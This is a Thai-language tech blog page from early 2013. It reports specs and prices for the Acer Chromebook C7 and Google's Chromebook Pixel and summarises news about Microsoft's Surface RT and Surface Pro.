Acer ประกาศเปิดตัวเครื่อง Chromebook C7 ที่ภายในใช้เป็นระบบ Chrome OS จาก Google  ขนาด 11.6 นิ้วตัวใหม่ล่าสุดอย่างเป็นทางการ หลังจากที่ได้เปิดตัวตัวแรกไปแล้วเมื่อเดือนก่อนหน้า ที่มาพร้อมราคาบนป้าย $199 (6,xxx บาท) ส่วนตัวใหม่ C710-2605 จะเพิ่มราคาเข้าไปอีกเท่าตัว เป็น $299 (9,xxx บาท) โดยจะได้แรมเพิ่มขึ้นมาจากเดิมอีกเท่าตัวเป็น 4GB ฮาร์ดดิสก์ขนาด 500GB แบตเตอรี่ภายในความจุ 5,000 mAh นอกนั้นก็เหมือนเดิมกับตัวเก่า สำหรับสเป็กก็จะเป็นชิป Intel Cerelon 1.10GHz พร้อม WLAN, GbE, USB2.0/1.1, HDMI และ D-Sub

ที่มา: http://notebookspec.com

Chromebook Pixel โน้ตบุ๊กเครื่องแรกจาก Google


Chromebook เองเป็นชื่อเรียกของโน้ตบุ๊กติดตั้งระบบปฏฺิบัติการ Chrome OS มาให้ในตัวเครื่องด้วย ซึ่งในตอนแรกนั้น Google ร่วมกับผู้ผลิตรายอื่นๆ นำเอาระบบปฏิบัติการดังกล่าวนี้ไปติดตั้งในโน้ตบุ๊กของพวกเขาเองเพื่อจำหน่ายกันอย่างสนุกสนาน โดดเด่นด้วยการทำงานผ่านระบบ Cloud และมีราคาที่ไม่แพง แต่ว่า Google เองก็เป็นเสือซุ่มพัฒนา Chromebook ด้วยตัวเองของตัวเองมาวางจำหน่ายด้วยเช่นกัน โดยมีผู้รับทำ OEM ให้ ซึ่งนับว่าเป็น Chromebook เครื่องแรกโดยฝีมือ Google จริงๆ โดยอานิสงค์ทั้งหมดนี้ มาจากสมัยที่กำลังพัฒนา Nexus 4, 7, 10 อยู่นั่นเอง
Chromebook จาก Google โดย Google เครื่องนี้นั้น ทาง Google ให้ชื่อว่า “Chromebook Pixel” ซึ่งบอดี้ตัวเครื่องนั้นทำจากวัสดุอะลูมิเนียมและทัชแพดเป็นกระจกแข็งพิเศษที่สามารถคลิกได้เหมือนพลาสติกแบบทั่วไปที่นำมาประกอบทัชแพด รวมไปถึงมี Lightbar ที่อยู่บริเวณฝาหลังด้านบนองเครื่อง ดีไซน์โดยรวมถือว่าสวยามหรูหราและมีความเหลี่ยมมากๆ
Chromebook Pixel จะมีขนาดหน้าจอที่ 12.85 นิ้ว (13 นิ้ว) ความละเอียดหน้าจออยู่ที่ 2560 x 1700 พิกเซล หน้าจอระดับความละเอียด 4.3 ล้านพิกเซล มีความหนาแน่นของพิกเซลที่ 239 ppi และอัตรา Ratio อยู่ที่ 3:2 แบบภาพถ่าย โดยทาง Google กล่าวว่าค่า Ratio นี้จะให้มุมมองแนวตั้งที่มากกว่าค่า Ratio ที่ 16:9  ความสว่างอยู่ที่ 400 nit มีความหนาแน่นกว่า MacBook Pro with Retina Display ขนาด 13 นิ้วที่มีความหนาแน่นของพิกเซลที่ 227 ppi เท่านั้น หน้าจอรองรับระบบสัมผัสแบบ Capacitibe รองรับ Multi-Touch ใช้กระจก Gorilla Glass ความหนา 0.55 มิลลิเมตร มีมุมมองหน้าจอกว้างถึง 178 องศา ซึ่งคาดได้ว่าใช้พาเนลคุณภาพสูง IPS แน่นอน ฉะนั้นเครื่องสีสันสมจริงหายห่วง 
สเปกของ Chromebook Pixel นั้น จะมีดังนี้
  • ขนาดหน้าจอ 12.85″ ที่สัดส่วน 3:2 มีความละเอียด 2560 x 1700 พิกเซล ที่ความหนาแน่น 239 ppi ความสว่าง 400 nit
  • ซีพียู Intel Core i5 แบบ Dual-Cores ความเร็ว 1.8 GHz 
  • กราฟิกการ์ด Intel HD Graphic 4000 (ต้องดูกันต่อว่าขับความละเอียดระดับนี้ไหวหรือเปล่า)
  • SSD ความจุ 32 และ 64 GB พร้อมระบบ Cloud Storage ความจุ 1 TB จาก Google เป็นเวลา 3 ปี
  • แรม 4 GB แบบ DDR3 
  • USB 2.0 จำนวน 2 ช่อง (ขัดใจมากๆ ตรงนี้)
  • Card Reader รองรับ SD/MMC Card 
  • ติดตั้งไมค์มาให้ 3 ตัว
  • MiniDisplay Port
  • Webcam 720p
  • Wifi 802.11 a/b/g/n แบบ 2×2
  • Bluetooth 3.0
  • ติดตั้งระบบ DSP Noise Cancellation มาให้ในเครื่อง
  • แบตเตอรี่ 59 Wh รองรับการทำงานต่อเนื่องได้ 5 ชั่วโมงติดต่อกัน
  • มิติตัวเครื่อง 297.7 x 224.6 x 16.2 มิลลิเมตร หนัก 1.52 กิโลกรัม
  • ระบบระบายความเย็นแบบพิเศษ ไม่เจาะช่องระบายความร้อนเอาไว้ (น่าสนใจตรงนี้)
  • ผ่านมาตรฐาน ENERGY STAR
  • คีย์บอร์ดแบบ Backlit มีแสงไฟในที่มืด
โปรแกรมภายใน Chromebook Pixel นั้นจะติดตั้งโปรแกรมหลักๆ เพื่อใช้ทำงานมาให้ในระดับหนึ่งแล้ว ได้แก่โปรแกรมสำหรับทำงานเอกสารและติดตั้งระบบป้องกันไวรัสที่ได้ Kaspersky มาจัดการให้ด้วย สำหรับ Chromebook Pixel นี้ รุ่นความจุ 32 GB จะเป็นรุ่น Wifi อย่างเดียว และรุ่น 64 GB จะติดตั้งระบบ LTE บนเครือข่าย Verizon มาให้ด้วย ซึ่งโปรโมชั่นพิเศษของรุ่น 64 GB LTE นั้น จะได้รับ
  • บริการ Wi-Fi บนเครื่องบินของ GoGo จำนวน 12 เที่ยวบิน
  • บริการอินเตอร์เน็ตผ่านระบบ LTE เดือนละ 100MB เป็นเวลาสองปี
  • หากมีเปิดบริการอินเตอร์เน็ตกับ Verizon ไว้แล้ว จะสามารถเพิ่มอีก 10 ดอลล่าร์ให้ไม่จำกัด Data Plan ได้ด้วย 
สำหรับราคาที่ทาง Google ประกาศออกมานั้น สำหรับรุ่น 32 GB Wifi นั้น สนนราคา 1,300 ดอลล่าร์ (ประมาณ 40,000 บาท) ส่วนรุ่น 64 GB LTE จะอยู่ที่ 1,450 ดอลล่าร์ (ประมาณ 45,000 บาท) สามารถจับจองได้ผ่านทาง Google Play Store และทาง Best Buy ได้ทั่วโลก และกำหนดวางจำหน่ายนั้น คือสัปดาห์แรก เดือนเมษายนที่จะถึงนี้
ซึ่งสำหรับราคาในระดับนี้ หลายๆ คนที่อยากได้อาจจะพลอยหมดอารมณ์กันไปบ้าง แต่ว่าได้อ่านสเปกเต็มๆ กันแล้วคงจะเลือกได้ง่ายขึ้นบ้าง หากว่าไปเทียบกับ MacBook Pro with Retina Display ขนาด 13 นิ้ว ด้วยกัน แต่ก็ขึ้นอยู่กับรสนิยมของผู้ใช้อีกเหมือนกัน ว่าจะยอมหรือไม่ยอม แต่ถ้าผู้เขียนล่ะก็ อยากได้รุ่น 32 GB ไม่เอาโปรโมชั่นเสริมอะไรทั้งนั้น และขอให้โครงข่ายสัญญาณอินเตอร์เน็ตในบ้านเราดีขึ้นอีกสักนิดเถอะนะ รวมไปถึงอยากจับมารีวิวจริงๆ ให้ตายเถอะ :p
ที่มา : http://notebookspec.com

Tuesday, February 12, 2013

Surface Pro บนแอพอโดบีอยู่, ปล่อยโฆษณารุ่น Pro


ช่วงไม่กี่วันที่ผ่านมา มีข่าวสารเกี่ยวกับ Surface (ทั้ง RT และ Pro) พอสมควร สรุปได้ดังนี้
  • ไมโครซอฟท์เตรียมปล่อยแพตช์แก้ปัญหาการเชื่อมต่อไวไฟบน Surface RT สองครั้ง คือ Patch Tuesday รอบเดือนกุมภาพันธ์และรอบเดือนมีนาคมตามลำดับ
  • Surface Pro จะสิ้นสุดการสนับสนุนหลัก (mainstream support) ที่ 10 ก.ค. 2560 ซึ่งเร็วกว่าการสิ้นสุดการสนับสนุนหลักของ Windows 8 ที่ 9 ม.ค. 2561
  • ไมโครซอฟท์ปฏิเสธโครงการ trade-in นำ Surface RT เครื่องเก่ามาเป็นส่วนลดซื้อ Surface Pro (ZDNet ไม่ได้อ้างอิงข่าวต้นเรื่องของโครงการ trade-in ไว้ แต่ผมเข้าใจว่าข่าวนี้เกิดตั้งแต่ Neowin รายงานเมื่อก่อนการวางขาย Surface Pro ในวันที่ 9 ก.พ. ที่ผ่านมา)
  • บริษัทกำลังแก้ปัญหาปากกาของ Surface Pro ที่มีผู้ใช้รายงานว่าใช้งานบนแอพของอโดบีอย่าง Photoshop ไม่ได้ โดยบริษัทกล่าวว่าปากกานั้นสามารถใช้งานบน Photoshop ได้ แต่ฟีเจอร์รับรู้แรงกด (pressure sensitivity) และฟีเจอร์ลบข้อมูลยังไม่สามารถใช้งานได้ เนื่องจาก Surface Pro ใช้ Windows Inbox Driver และชุด API เฉพาะ บริษัทกำลังทำงานร่วมกับคู่ค้าต่างๆ เพื่อให้ในอนาคตอันใกล้ฟีเจอร์เด่นของปากกา Surface ใช้งานบนแอพต่างๆ ได้
  • ทีมงาน Surface ชี้แจงว่าในอนาคตจะมี Touch Cover หลากสีมากกว่านี้ ส่วน Type Cover นอกเหนือจากสีดำนั้นน่าจะเป็นไปได้ในอนาคต
  • บริษัทไม่มีแผนที่จะขาย Surface RT และ/หรือ Surface Pro แบบ volume license
  • บริษัทได้ปล่อยโฆษณาชุดแรกของ Surface Pro แล้ว (ดูได้ข้างล่าง) ซึ่งกำกับโดยผู้กำกับเดียวกับคนที่กำกับโฆษณา Surface RT และต่อมา Stay Classy Studios ซึ่งอยู่เบื้องหลังโฆษณาชุดนี้ก็ได้ปล่อยคลิปวิดีโอชุดเต็มของโฆษณาดังกล่าวออกมา ซึ่งมีการกัดจิก iPad เล็กน้อยในตอนท้าย